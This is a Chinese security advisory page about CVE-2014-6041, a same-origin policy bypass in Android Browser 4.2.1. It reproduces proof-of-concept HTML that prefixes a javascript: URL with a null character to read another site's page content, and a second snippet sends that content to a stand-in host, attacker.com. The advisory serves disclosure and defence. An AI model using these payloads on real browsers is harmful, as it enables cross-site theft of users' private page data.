首页 -> 安全研究

安全研究

安全漏洞
Google Android Browser同源策略安全限制绕过漏洞(CVE-2014-6041)

发布日期:2014-09-02
更新日期:2014-09-18

受影响系统:
Google Android Browser 4.2.1
描述:
BUGTRAQ  ID: 69548
CVE(CAN) ID: CVE-2014-6041

Android是基于Linux开放性内核的操作系统,是Google公司在2007年11月5日公布的手机操作系统。

Android浏览器应用4.2.1版本在实现上存在安全限制绕过漏洞,远程攻击者通过包含\u0000字符的构造属性,利用此漏洞可绕过同源策略。

<*来源:Rafay Baloch
  
  链接:http://xforce.iss.net/xforce/xfdb/95693
        http://1337day.com/exploit/22581
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Rafay Baloch ()提供了如下测试方法:

*Reading the response*


You can read the response of any page by accessing the
document.body.innerHTML property.


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')"
>


*Stealing the response and sending it to an attackers domain*


In real world situation an attacker would send the response to his
controlled domain.


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:var i=new Image();i.src='//
attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')"
>

建议:
厂商补丁:

Google
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://code.google.com/android/

参考:https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041

浏览次数:32419
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障